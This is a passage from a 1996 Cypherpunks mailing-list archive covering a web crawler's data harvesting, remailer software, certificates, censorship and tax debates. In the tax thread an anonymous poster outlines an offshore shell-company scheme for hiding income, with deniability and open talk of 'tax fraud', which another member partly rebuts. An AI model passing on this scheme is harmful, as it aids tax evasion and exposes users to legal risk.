  the Robot Exclusion Standard. However, they were not interested in
  shutting the robot down, or sharing the source code.

* They deny association with the "WhoWhere Robot" probes operating out of
  Japan and Australia. I expressed concern that someone may have stolen
  their spider somehow. They'll look into it.

* The person I talked to agreed that WhoWhere's initially writing programs
  to brute-force tens of thousands of addresses out of the okra.ucr.edu
  service was improper. I expressed concerns that the current version of
  their web crawler appeared to have no safeguards against a recurrence.

* Certain other allegations were confirmed, denied, or confidential.

* WhoWhere does seem to take concerns about the inappropriate disclosure
  of information that was never intended to be publicly available
  seriously. :-)

* They do indeed have formal business relationships with ABI, InfoSeek,
  Switchboard, and Netscape (details on the Netscape relationship are not
  publicly available).

* I did not feel at all threatened by remarks made as we were leaving.

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMZAs/Y3DXUbM57SdAQE7KQP/cvth6OaIopocvHM9dIEwkwDnEYqY5gZ0
QlJk00imT3nzBQTXffqZdq8I8lEpYhshibe0VPzAK0KgUthzE7/hyb12DKBQuNYz
mGqkQRNcY0r9Fcg6dbl+pBPltf3XgOE7one1uziRvd12uL9skEyTMBcR41WiFs84
f+uKBfGD2qk=
=hROh
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 8 May 1996 14:20:42 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Why I Pay Too Much in Taxes
In-Reply-To: <199605080206.TAA24111@pacifier.com>
Message-ID: <Pine.SUN.3.93.960507222850.339O-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 7 May 1996, jim bell wrote:

> >Considering that there is one bracket for capital gains income (namely
> >28%) what does this have to do with bouncing you into the next income tax
> >bracket?
> 
> Well, you can play all the word-games you want, but many people use the term 
> "tax bracket" to mean the amount of tax they pay as a proportion of income.  

1) Read original message.  
2) Determine what was meant by "tax bracket."
3) Revisit question as to who is playing "word games."
4) Take reply to e-mail.

> Jim Bell
> jimbell@pacifier.com

- ---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Autodocument signed

iQCVAwUBMZAHsmqgui0rHO4JAQFMLwP9EsmJ/xC8E6jkdj/0r35Kq676yxi4YAcb
6s/aWLzJZo56KMJT7cZsGT8fzdm4tBFZumKDNY8FwAg9VW7gsG6qeYg4DpqRapyz
TeN6qRfzemZrdzUT5r4Fd3TSnNZhvdk1kKKQpnqfPmosX4AcLj9uCwZfm8TPRS7X
BAf3WrFd5LQ=
=8uWq
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 8 May 1996 18:21:16 +0800
To: cypherpunks@toad.com
Subject: (fwd) Christopher Ruddy on Colby 5/7/96 (fwd)
Message-ID: <199605080546.WAA27143@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Theories on cause of Colby death abound

By Christopher Ruddy
FOR THE TRIBUNE-REVIEW

WASHINGTON - The body of "the Old Gray Man of the CIA," William Colby,
has been found in waters near his
weekend home, but theories about his demise continue to thrive.

Colby, who served as CIA director under Presidents Nixon and Ford,
disappeared April 28. Maryland authorities found
his body Monday morning after it washed ashore. This followed an
intensive search of the Wimcoico River near Colby's
home in Rock Point, Md. Local police believe his body was lost in the
cloudy waters of the Wicomico while canoeing, a
favorite pastime of Colby's.

At 76, Colby was physically fit and, after surviving parachute drops
behind Nazi lines in War World II and stints in
Vietnam, he was a cautious, careful and cunning man who lived up to
his James Bond super-spy credentials. 

Last week, The New York Post's irreverent Page Six raised concerns
about Colby's disappearance and apparent death
with an article headlined "Conspiracy Crowd Snatches Colby." "The
theory among conspiracy-minded, cloak-and-dagger
buffs is that Colby was assassinated so he wouldn't spill any more
agency secrets," the gossip page began. Agency
insiders reportedly resented Colby for talking to Congress about the
"family jewels" - supposed illegal operations the
agency conducted in the decades before Watergate. As a result, Colby
lost the support of agency insiders and the Ford
administration. President Ford fired Colby on Halloween 1975.

Some theorists point to the similar circumstances surrounding the 1978
death of CIA deputy director John A. Paisley.
Paisley's sailboat was found adrift in the Chesapeake Bay just 15
miles from Colby's home. His body was discovered
days later. He died of an apparent gunshot behind his ear. His body
had been weighted with diving belts. Since no blood
was found on the boat, authorities theorized Paisley first jumped into
the water and then fired the shot into his head.
However, murder was never ruled out in the case.

While some refuse to believe 20-year-old grudges could have led to
Colby's demise, others, including Fred Davis, the
Maryland county sheriff in charge of the probe, still find the death
suspicious and haven't ruled out foul play Already, the
death has been the buzz of talk radio and the Internet. Pittsburgh's
Jim Quinn on WRRK-FM joked that Colby's body
will rise to the top as soon as "someone cuts the concrete slabs tied
to his feet."

New York shock-jock Don Imus, whose recent roast of the Clintons
caused a stir, started off one of his morning
programs wondering what the "Whitewater" connection was with Colby's
death - a reference, no doubt, to the high
number of deaths likened to a web of Arkansas scandal. Even though
Imus didn't realize it, Colby did have a Whitewater
connection. For the past two years, he has been a contributing editor
with a monthly financial newsletter, Strategic
Investment. Co-edited by James Dale Davidson and former Times of
London editor Lord William Rees Mogg, Strategic
is read by more than 100,000 subscribers worldwide and has been
closely monitoring the Whitewater scandal. 

Davidson has written in the newsletter that Vincent Foster, former
White House deputy counsel, was murdered and that
significant evidence links the Clintons to drug trafficking, murder
and organized crime in their home state of Arkansas.
Foster was found shot to death more than two years ago in Fort Marcy
Park near Washington, D.C. The Wall Street
Journal editorialized that it was glad to see James Davidson "pushing
the envelope" on the Whitewater scandal.

Colby began taking a more active role in the newsletter in February,
writing a weekly column on geo-political matters and
their effects on investments in Strategic Weekly Briefings - a
facsimile newsletter tailored for high-income investors. Colby
traveled with Davidson several times to Asia, leading groups of
investors.

In his columns, Colby never touched upon the Clintons or the
Whitewater affair. His name and former association with the
CIA was no doubt a real credibility boost for the newsletter and was
touted throughout the newsletter and its promotional
brochures (which often detailed the newsletter's reporting of the
darker side of Whitewater). "I find the death suspicious
for a lot of reasons," Davidson told the Tribune-Review. He does not
link his Whitewater coverage to the death, but
points to problems associated with Colby's disappearance. "It's not
clear how his life jacket and paddle, which he always
took canoeing with him, disappeared,''he said. 

Davidson also is disturbed by an early Associated Press report quoting
Mrs. Colby as having spoken with her husband
on the day of the death. The AP reported that Colby said he was not
feeling well, but planned to go canoeing anyway. In
a statement this week, Mrs. Colby, who was in Texas when she spoke to
her husband for the last time, said he was
feeling fine, and never mentioned any plans to go canoeing. 

Davidson described Colby as a "charming and fit" man who had great
stamina traveling. "He was a New Deal Democrat
like many who started in the OSS (the forerunner to the CIA),"
Davidson remarked. According to Davidson, one of his
staff members contacted local police who said they were perplexed as
to where the AP got the original report on Colby's
conversation with his wife.

Some old Cold Warriors recollect Colby's longstanding feud with James
Jesus Angleton, the longtime head of the CIA's
counterintelligence division. Angleton believed the CIA had been
infiltrated by KGB moles; Colby believed Angleton had
become symptomatic of Cold War paranoia and forced his ouster in 1974.
After his dismissal, a bitter Angleton told
associates he believed that Colby had been recruited by the KGB and
was a long-term asset of the Soviets. Angelton's
supporters noted Colby's association with far left committees -
including ones supported by the Institute for Policy Studies
- after Colby departed from the CIA. Colby also called for near
unilateral disarmament - an immediate 50 percent
reduction in the American defense budget during the height of
East-West tensions.

One friend of Colby's scoffed at such notions and suggested that his
espousal of unorthodox views were not based on a
longtime hidden ideology, but may be explained by his desire to live
down an undesirable reputation he acquired in
Vietnam for heading up the controversial Operation Phoenix, a program
to eradicate peasant support of the Viet Cong,
for which Colby had been branded by war protesters as a war criminal. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 8 May 1996 15:19:21 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Why I Pay Too Much in Taxes
In-Reply-To: <199605072244.AAA02953@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.93.960507223421.339P-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 8 May 1996, Anonymous wrote:

> Timothy C. May wrote:
> >Indeed, I am extremely limited in how I can avoid complete traceability of
> >my major income sources. Not rich enough to shelter income in a really big
> >time way
> 
> That's just lack of creativity. Try this:
> 
> Get a friend of yours to setup a consulting company and
> hire you (and maybe a few more people who pay too much
> taxes,acting like a mixmaster). The company pays you salary
> to cover your cost of living. Anything above that, i.e.
> money that you would otherwise save, is paid to an offshore
> company as license fees (or something, this is the creative
> part).

Where does the company get the funds to pay you?

As the source of personal services income is the site of the preformance
of services, your salary will be taxible at U.S. rates.  Licensing fees
hoarded into an offshore holding company will be taxed yearly regardless
of their distribution as dividens (if the money is invested as equity)
and the principal taxed on repayment if characterized as debt.  It will
not, of course be legally yours if deposited without either
classification.

> This is really legal as long as you don't receive any money
> from offshore without paying the taxes. If you borrow the
> money back it gets a little fuzzy.

Except that it is going to cause your friend who set it up to incur the
penalities that surround classification of his company as a Foreign
Personal Holding Company.  If he is a U.S. citizen, he can deduct the
costs of sending you salary, but that means he still has to pay about 60%
of what goes out.  (Revisit the double taxation issue).

> Thousands of people in upper middle class are doing exactly
> this, so the mixmaster is really in place already. The local
> mix is just an extra precaution for deniability (it was my
> friends company, I had no idea what he was up to!).
> 
> For the friend to accept the (very minor) risk of jail,
> he/she should probably be much poorer than you, or have
> a *lot* of clients, to make his pay outweight the risk.

What pay?  I don't get it.  Where does this friend gets his money?

> By the way, are there any PGP encrypted mailing lists for
> discussing serious tax fraud?

If such a list existed, would we tell an anonymous poster/fed?

If your above scheme is intended merely to conceal funds it is a fairly
poor example as it depends on the secrecy of each and every 'employee' of
the company.

> 
> Mr.X
> 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Autodocument signed

iQCVAwUBMZAMNGqgui0rHO4JAQEV5gP+KRMrGMiqhcWznJs/tOw/gmW7GupfLGN1
UIliPgELUDK1YdRG/LLzKNp5xz9CM7WNNg4gNBEMxkVlCBMumDP7RRcAosWuyxy7
6QwBd/uul9MynZqAoDMI3Tant9j4XpFZOeg7LkvJ0wAJU5jin7JSsrJfQLPEvT4+
+jsRcmJxSB4=
=MUh4
-----END PGP SIGNATURE-----

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 8 May 1996 15:02:41 +0800
To: frantz@netcom.com
Subject: Re: Transitive trust and MLM
Message-ID: <01I4FWT0RUI88Y59HH@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"frantz@netcom.com"  7-MAY-1996 23:02:33.09

>Some of the solution to this problem may come from the answer to the
>question, "What am I trusting the receiver with?"  I can see a number of
>possibilities:

	I think you've forgotten to allow for the signature use. I may want to
know if someone who's posting is indeed the usual/proper person posting from
that address, and in most situations without transitivity I won't be able to
tell.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 8 May 1996 18:43:30 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Transitive trust and MLM
In-Reply-To: <199605072229.PAA28013@netcom8.netcom.com>
Message-ID: <Pine.GUL.3.93.960507231202.14261E-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 May 1996, Bill Frantz wrote:

> Some of the solution to this problem may come from the answer to the
> question, "What am I trusting the receiver with?"  I can see a number of
> possibilities:
> 
> (1) I just want an envelope so casual eavesdroppers can't read the mail. 
> Given the people Rich Graves has been dealing with, I see this as a
> powerful reason to encrypt all private email, just as you might send all
> private postal mail in envelopes rather than on postcards.

Oh, those WhoWhere? guys are just a bunch of pussycats.

The fact that you're sending postcards is only a problem if you don't want
them to be read. It's more the email I receive that I worry about, so all 
my friends use the address rich@alpha.c2.org now.

You should only worry about men in the middle when you're playing
volleyball. The endpoints are usually far more vulnerable.

-rich
 http://www-leland.stanford.edu/~llurch/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Wed, 8 May 1996 19:57:18 +0800
To: cypherpunks@toad.com
Subject: Re: remailer-in-a-box
Message-ID: <adb5ec01090210047acd@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:51 PM 5/7/96, anonymous-remailer@shell.portal.com wrote:
>No one answered me.
>What's the best remailer-in-a-box.
>I'd like to run one.  I would think people would be falling
>over eachother to tell me.

The reason for the quiet may be twofold. First, I and many others delete
unread list messages with out subjects. Second, remailer-in-a-box does not
really exist. Mixmaster, and most of the other remailers are fairly easy to
set up for anyone with UNIX experience. I run Mixmaster + Ghio + reorder
scripts.

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Wed, 8 May 1996 13:13:00 +0800
To: cypherpunks@toad.com
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <199605072244.AAA02953@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
>Indeed, I am extremely limited in how I can avoid complete traceability of
>my major income sources. Not rich enough to shelter income in a really big
>time way

That's just lack of creativity. Try this:

Get a friend of yours to setup a consulting company and
hire you (and maybe a few more people who pay too much
taxes,acting like a mixmaster). The company pays you salary
to cover your cost of living. Anything above that, i.e.
money that you would otherwise save, is paid to an offshore
company as license fees (or something, this is the creative
part).

This is really legal as long as you don't receive any money
from offshore without paying the taxes. If you borrow the
money back it gets a little fuzzy.

Thousands of people in upper middle class are doing exactly
this, so the mixmaster is really in place already. The local
mix is just an extra precaution for deniability (it was my
friends company, I had no idea what he was up to!).

For the friend to accept the (very minor) risk of jail,
he/she should probably be much poorer than you, or have
a *lot* of clients, to make his pay outweight the risk.

By the way, are there any PGP encrypted mailing lists for
discussing serious tax fraud?

Mr.X






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 8 May 1996 21:21:04 +0800
To: cypherpunks@toad.com
Subject: Re: Why I Pay Too Much in Taxes
In-Reply-To: <Pine.SV4.3.91.960505214552.19234C-100000@larry.infi.net>
Message-ID: <Pine.LNX.3.91.960508012831.217B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 5 May 1996, Alan Horowitz wrote:
> << " I paid approximately 60%...." >>
> didn't the feudal vassels only pay 33% ?      To paraphrase - I forget 
> which Presidential candidate of yore - "are you better off than you were 
> a thousand years ago?"

	The very fact that we are having this conversation in this manner 
would indicate to me that yes, we are. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 8 May 1996 22:58:35 +0800
To: Black Unicorn <tcmay@got.net>
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <2.2.32.19960508101653.00985b20@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:46 PM 5/7/96 -0400, Black Unicorn wrote:

>I'm not sure I understand what you mean.  I sent the text of the law to
>the list.  The position that you take (that increse in inflation can send
>you into the next tax bracket) is incorrect.

I believe Tim was making the generic point that in spite of loads of "tax
reform" average total taxes paid in the US are higher than they have ever
been.  Yesterday was "Tax Freedom Day" and was the latest it has been.
  
DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Wed, 8 May 1996 20:29:22 +0800
To: cypherpunks@toad.com
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <199605080632.IAA24692@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:
>Where does the company get the funds to pay you?

>From Tim's day work. It's a consulting company, i.e. it sells his
services to whomever is employing him today. The whole idea
was to hide Tim's income sources, or that's what he asked for anyway.

You can hide your income by putting it in another jurisdiction.

>What pay?  I don't get it.  Where does this friend gets his money?

As a cut from the money Tim's employer gives him.

>> By the way, are there any PGP encrypted mailing lists for
>> discussing serious tax fraud?
>
>If such a list existed, would we tell an anonymous poster/fed?

>If your above scheme is intended merely to conceal funds it is a fairly
>poor example as it depends on the secrecy of each and every 'employee' of
>the company.

No it doesn't. One person knows where they money went when it left the
country (and he is getting paid for the risk of doing time). Nobody knows
where the funds are concealed. Probably in a trust that you can access
when you are on vacation abroad.

Mr.X.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hrwatchnyc@igc.apc.org
Date: Thu, 9 May 1996 21:28:25 +0800
To: hrw-news@igc.apc.org
Subject: Cyberspace--Silencing the Net
Message-ID: <199605081501.IAA13984@igc2.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain


EFFORTS TO CENSOR THE INTERNET EXPAND
U.S. a Miserable Role Model with Passage of Communications Decency Act 

May 10, 1996 (New York) Governments around the world, claiming they want to
protect children, thwart terrorists or silence racists and hate mongers, are
rushing to eradicate freedom of expression on the Internet. "The U.S. Congress
and the Clinton administration, reacting to recent hysteria over  cyberporn,'
led the way by passing the Communications Decency Act," says Karen Sorensen,
Human Rights Watch on-line research associate. "It is particularly crucial
now, in the early stages of vast technological change, that all governments
reaffirm their commitment to respect the rights of citizens to communicate
freely, and for the United States as the birthplace of the Internet, to be a
model for free speech, not censorship," she adds. Human Rights Watch is a
plaintiff in the lawsuit brought by the American Civil Liberties Union
challenging the CDA on constitutional grounds. The hearings in the lawsuit,
which was filed in U.S. Federal District Court on February 8 (the day it was
signed into law) end today in Philadelphia, Pennsylvania. The judges are
expected to rule shortly thereafter.

In addition, Human Rights Watch is calling on the nations participating in the
G7 Ministerial Conference on the Information Society and Development to be
held in South Africa from May 13-15, 1996, to repudiate the international
trend toward censorship and to express unequivocal support for free expression
guarantees on-line. Among the G7 countries Britain, Canada, France, Germany,
Italy, Japan, and the United States only the U.S. has actually passed
legislation curtailing freedom of expression on-line. The trend toward
restricting on-line communication is growing, according to Silencing the Net:
The Threat to Freedom of Expression On-line, which documents restrictions that
have been put in place in at least twenty countries, including the following:  

--   China, which requires users and Internet Service Providers (ISPs) to
register with authorities; 

--   Vietnam and Saudi Arabia, which permit only a single, government-
controlled gateway for Internet service;

--   United States, which has enacted new Internet-specific legislation that
imposes more restrictive regulations on electronic expression than those
currently applied to printed expression; 

--   India, which charges exorbitant rates for international access through
the state-owned phone company;

--   Germany, which has cut off access to particular host computers or
Internet sites; 

--   Singapore, which has chosen to regulate the Internet as if it were a
broadcast medium, and requires political and religious content providers to
register with the state; and 

--   New Zealand, which classifies computer disks as publications and has
seized and restricted them accordingly.

Human Rights Watch recommends principles for international and regional bodies
and nations to follow when formulating public policy and laws affecting the
Internet, sets forth the international legal principles governing on-line
expression, and, examines some of the current attempts around the globe to
censor on-line communication.

The 24-page report is available via e-mail at sorensk@hrw.org or from the
Human Rights Gopher: 
URL: gopher://gopher.humanrights.org:5000/11/int/hrw/general 

Paper copies of Silencing the Net are available from the Publications
Department, Human Rights Watch, 485 Fifth Avenue, New York, NY 10017-6104 for
$3.60 (domestic), $4.50 (international). Visa/MasterCard accepted. 

Human Rights Watch
Human Rights Watch is a nongovernmental organization established in 1978 to
monitor and promote the observance of internationally recognized human rights
in Africa, the Americas, Asia, the Middle East and among the signatories of
the Helsinki accords.  It is supported by contributions from private
individuals and foundations  worldwide.  It accepts no government funds,
directly or indirectly.  The staff includes Kenneth Roth, executive director;
Cynthia Brown, program director; Holly J. Burkhalter, advocacy director;
Barbara Guglielmo, finance and administration director; Robert Kimzey,
publications director; Jeri Laber, special advisor; Gara LaMarche, associate
director; Lotte Leicht, Brussels office director; Juan Mndez, general
counsel; Susan Osnos, communications director; Jemera Rone, counsel; and
Joanna Weschler, United Nations representative.  Robert L. Bernstein is the
chair of the board and Adrian W. DeWind is vice chair.  

Human Rights Watch
485 Fifth Avenue
New York, NY 10017-6104
TEL: 212/972-8400
FAX: 212/972-0905
E-mail: hrwnyc@hrw.org
            
1522 K Street, N.W.
Washington D.C. 20005
TEL: 202/371-6592
FAX: 202/371-0124
E-mail: hrwdc@hrw.org 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 9 May 1996 00:01:34 +0800
To: Black Unicorn <tcmay@got.net>
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <2.2.32.19960508103911.0096c07c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:16 PM 5/7/96 -0400, Black Unicorn wrote:

>My 1994-1995 code indicates 39.6% for single heads of households with
>incomes over $250,000.  (Pay $77,299, plus 39.6% of the excess over
>$250,000).  That was for the 1994 tax year.
>
>If there was an explicit raise, I haven't heard (though this isn't too
>surprising, I haven't paid much attention to domestic U.S. tax rates
>lately).
>

Don't forget the 1.?% percent Medicare Tax that was uncapped in one of the
tax laws and now applies to all earned income no matter how high.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 9 May 1996 06:04:51 +0800
To: Raph Levien <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: PGP, Inc.
Message-ID: <v02120d13adb5e740aeeb@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:46 5/7/96, Raph Levien wrote:
[...]
>   The S/MIME spec indicates the use of X.509v3 certificates, which, in
>turn, are explicitly allowed to contain trust roots originating in the
>client's local configuration. In other words, yes, the spec allows for a
>Web of trust.
>   The big question, of course, is how easy the key management will be
>in such a case. Everything I've seen points to key management being
>super-easy if you use VeriSign certs, and probably just as bad as PGP
>otherwise. Unlike PGP, most e-mail clients will probably not come
>configured with the capablity to sign other keys - in the X.500 world,
>e-mail clients and "certification authorities" are two separate
>applications.

Since VeriSign is going to issue certs for nyms for free, the only
requirement being uniqueness, using their certs might not prove much of a
problem.


Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Thu, 9 May 1996 02:27:53 +0800
To: hoz@univel.telescan.com (rick hoselton)
Subject: Re: Disappearing Cryptography
Message-ID: <v02140b00adb508c4aeca@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain


>A book by Peter Wayner (pcw@access.digex.com),
>of interest to cypherpunks.
>(OK, cypherpunks mailing list subscribers then)
>
>There is more info at Peter's home page:
>http://www.access.digex.net/~pcw/pcwpage.html
>but I couldn't get to it when I tried just now.

Yes, my service provider, DIGEX, is really terrible about
providing access
to my net page.  I'm sorry about this, but if you need more
information,
feel free to write me.
>
>I got my copy from Border's in Houston on Sunday.
>
>He describes mimic functions, a particular interest of
>mine.  He also covers basic encryption, error correction,
>secret sharing, compression, context free grammers,
>anonymous remailers, reversible computing, etc.
>
>There is an evaluation of several stego packages, and
>an inclusive (there isn't enough published about
>steganography to call it extensive) bibliography.
>
>The presentation is at an introductory, but not trivial
>level.  I wish there had been more technical explanations,
>but I suppose the author would have lost a sizable fraction
>of an already tiny audience.
>

Yes, this was one dilemma I faced with writing the text and I
decided that a "Scientific American" level text would be more
likely to appeal to more people. In fact, my hope is that many
people will be interested in a presentation of this level
because of the political implications. If you can't find the
information, you can't censor it.

I think, though, that there will be plenty of meat on the bones
of this book for many people. Anyone who reads cypherpunks
carefully and works through the mathematical details won't find
much new here, but I don't know if there is much else out there.
The proceedings from the information hiding workshop in
Cambridge will generate some more papers, but that's in the
future.



>By the way, "the people who participate on the cypherpunks
>mailing list" get a nice "thankyou" in the preface.

Of course this should be repeated and amplified. Many people
post great stuff to the cypherpunks list. I couldn't have done
it without you. My only regret is that the best people on the
list might not learn much new from the book. Sigh.



>
>Rick F. Hoselton  (who doesn't claim to present opinions for
>others)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 9 May 1996 03:53:15 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Remailer in a box
Message-ID: <199605081333.IAA11436@homeport.org>
MIME-Version: 1.0
Content-Type: text


You should at least bother to read the list before claiming no one
answered.

Adam

>From adam Sat May  4 09:43:26 1996
>Subject: Re: your mail
>To: anon-remailer@utopia.hacktic.nl (Anonymous)
>Date: Sat, 4 May 1996 09:43:26 -0500 (EST)
>Cc: cypherpunks@toad.com
>In-Reply-To: <199605040605.IAA19372@utopia.hacktic.nl> from
>"Anonymous" at May 4
>, 96 08:05:07 am
>X-Mailer: ELM [version 2.4 PL24 ME8b]
>Content-Type: text
>Content-Length: 329       
>Status: RO
>
>Mixmaster with my install script.  Get mixmaster from www.obscura.com,
>my installer by sending me mail with a subject line:
>get mix-installer
>
>Adam

<>----- Forwarded message from anonymous-remailer@shell.portal.com -----
<>
<>From cypherpunks-errors@toad.com  Tue May  7 22:11:26 1996
<>Date: Tue, 7 May 1996 15:51:06 -0700
<>Message-Id: <199605072251.PAA01721@jobe.shell.portal.com>
<>To: cypherpunks@toad.com
<>From: anonymous-remailer@shell.portal.com
<>Comments: This message is NOT from the person listed in the From
<> line.  It is from an automated software remailing service operating at
<> that address.
<> THE PORTAL SYSTEM DOES NOT CONDONE OR APPROVE OF THE CONTENTS OF THIS
<> POSTING.   Please report problem mail to <hfinney@shell.portal.com>.
<>Sender: owner-cypherpunks@toad.com
<>Precedence: bulk
<>
<>
<>No one answered me.
<>What's the best remailer-in-a-box.
<>I'd like to run one.  I would think people would be falling
<>over eachother to tell me.
<>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jay Haines" <jay_haines@connaught-usa.com>
Date: Thu, 9 May 1996 04:15:02 +0800
To: "loki@infonex.com>
Subject: Re: remailer-in-a-box
Message-ID: <n1380577627.55178@flu.connaught-usa.com>
MIME-Version: 1.0
Content-Type: text/plain


        Reply to:   RE>>remailer-in-a-box



>>No one answered me.
>>What's the best remailer-in-a-box.
>>I'd like to run one.  I would think people would be falling
>>over eachother to tell me.

>The reason for the quiet may be twofold. First, I and many others delete
>unread list messages with out subjects. Second, remailer-in-a-box does not
>.really exist. Mixmaster, and most of the other remailers are fairly easy to.
>set up for anyone with UNIX experience. I run Mixmaster + Ghio + reorder
>scripts.

>        -Lance


Does one exist for the MAC? If not, would anyone be interested enough to see
one developed?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 9 May 1996 07:39:13 +0800
To: cypherpunks@toad.com
Subject: Mandatory Voluntary Self-Ratings
Message-ID: <adb61de708021004cef3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:31 PM 5/7/96, Joseph M. Reagle Jr. wrote:

>thought police, or concerned but ignorant parents/congressmen. If
>self-labeling worked (which I see few cases in which it wouldn't) I can't
>see the concerned but ignorant being unhappy. Rather they'd be a bit better

Regarding this "(which I see few cases in which it wouldn't)" point, I have
a different view.

Should "voluntary self-criticism" become widespread, I expect to rate all
of my posts as suitable for children of all ages, suitable for
hypersensitive feminists, suitable for Jews and Gentiles alike, and so on.
Regardless of whether I'm advocating post-birth abortions or forced
encheferation of Muslim girls.

Then we'll see what happens. (This is an old debate, here and on the
Cyberia-l list, to wit, what happens when people/perverts/libertarians
choose to subvert the voluntary ratings by deliberately mis-rating their
stuff? Or what if they genuinely believe, a la NAMBLA, that youngsters
should be exposed to certain things?)

I believe the whole debate about PICs-type ratings and other "voluntary
self-labeling" has taken us astray.

I don't see calls for authors to voluntarily self-rate their print works,
nor do I see calls for newspapers to have articles rated. Nor speech in
general. However, the drumbeat of "V-Chip" advocacy is now spilling over
into cyberspace.

I say it's a waste of our time to even be thinking or worrying about how to
implement an infrastructure for ratings. In fact, building such an
infrastructure could make later imposition of "mandatory voluntary ratings"
(Orwell would be unsurprised) a greater likelihood.


--Tim May

THE X-ON CONGRESS:  INDECENT COMMENT ON AN INDECENT SUBJECT, by Steve
Russell, American Reporter Correspondent....You motherfuckers in Congress
have dropped over the edge of the earth this time... "the sorriest bunch
of cocksuckers ever to sell out the First Amendment" or suggesting that
"the only reason to run for Congress these days is to suck the lobbyists'
dicks and fuck the people who sent you there," ....any more than I care
for the language you shitheads have forced me to use in this
essay...Let's talk about this fucking indecent language bullshit.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 9 May 1996 06:00:59 +0800
To: "msmith" <msmith@rebound.slc.unisys.com>
Subject: Re: Senator Leahy's Public Key
In-Reply-To: <199605071951.TAA14244@rebound.slc.unisys.com>
Message-ID: <9605081459.AA20668@bart-savagewood.MIT.EDU>
